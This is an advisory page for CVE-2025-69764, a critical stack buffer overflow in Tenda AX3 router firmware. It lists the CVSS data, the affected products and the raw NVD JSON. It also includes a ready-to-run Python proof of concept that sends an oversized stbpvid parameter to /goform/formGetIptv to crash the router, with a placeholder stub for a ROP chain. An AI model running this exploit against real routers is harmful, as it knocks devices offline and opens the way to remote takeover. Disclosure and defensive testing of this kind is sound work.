Security Vulnerability Report
中文
CVE-2025-69764 CVSS 9.8 CRITICAL

CVE-2025-69764

Published: 2026-01-22 16:16:08
Last Modified: 2026-01-26 20:39:23
Source: [email protected]

Description

Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the stbpvid stack buffer, which may result in memory corruption and remote code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ax3_firmware:16.03.12.11:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AX3 固件 v16.03.12.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69764 PoC - Tenda AX3 formGetIptv Stack Buffer Overflow This PoC demonstrates the buffer overflow vulnerability in the formGetIptv function of Tenda AX3 router firmware v16.03.12.11 WARNING: Only use this for authorized security testing """ import requests import sys def exploit_tenda_ax3(target_ip, target_port=80): """ Exploit CVE-2025-69764 by sending an oversized stbpvid parameter to trigger stack buffer overflow in formGetIptv function Args: target_ip: IP address of the vulnerable Tenda AX3 router target_port: Web management port (default: 80) """ # Construct the target URL url = f"http://{target_ip}:{target_port}/goform/formGetIptv" # Create payload with oversized stbpvid parameter to trigger overflow # Buffer size is typically small (e.g., 64-128 bytes), so we send 500+ bytes # This will overwrite return address and potentially EIP/RIP payload_size = 600 payload = "A" * payload_size # Prepare the POST data data = { "stbpvid": payload # Vulnerable parameter } print(f"[*] Target: {url}") print(f"[*] Payload size: {payload_size} bytes") print(f"[*] Sending exploit payload...") try: # Send the malicious request response = requests.post(url, data=data, timeout=10) print(f"[+] Request sent successfully") print(f"[+] Response status: {response.status_code}") except requests.exceptions.Timeout: print("[!] Request timed out - possible successful exploitation") print("[!] Router may have crashed or rebooted") except requests.exceptions.ConnectionError: print("[!] Connection failed - router may be unresponsive") print("[!] This could indicate successful exploitation and device crash") except Exception as e: print(f"[!] Error: {str(e)}") def create_rop_payload(): """ Generate a more sophisticated ROP payload for actual exploitation This would require knowledge of the firmware's memory layout """ # Placeholder for ROP chain construction # In a real attack, this would include: # - Address of system() function # - Address of /bin/sh string # - Return address to exit() function rop_chain = "" return rop_chain if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2025-69764.py <target_ip> [port]") print("Example: python3 cve-2025-69764.py 192.168.0.1 80") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_tenda_ax3(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69764", "sourceIdentifier": "[email protected]", "published": "2026-01-22T16:16:07.660", "lastModified": "2026-01-26T20:39:22.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the stbpvid stack buffer, which may result in memory corruption and remote code execution."}, {"lang": "es", "value": "El firmware Tenda AX3 v16.03.12.11 contiene un desbordamiento de búfer basado en pila en la función formGetIptv debido a un manejo inadecuado del búfer de pila stbpvid, lo que puede resultar en corrupción de memoria y ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ax3_firmware:16.03.12.11:*:*:*:*:*:*:*", "matchCriteriaId": "9FFD11D4-8E44-4156-9D8E-7094E36A2152"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A01F4C4-FFFF-48DD-90DB-4DD29FE57479"}]}]}], "references": [{"url": "https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.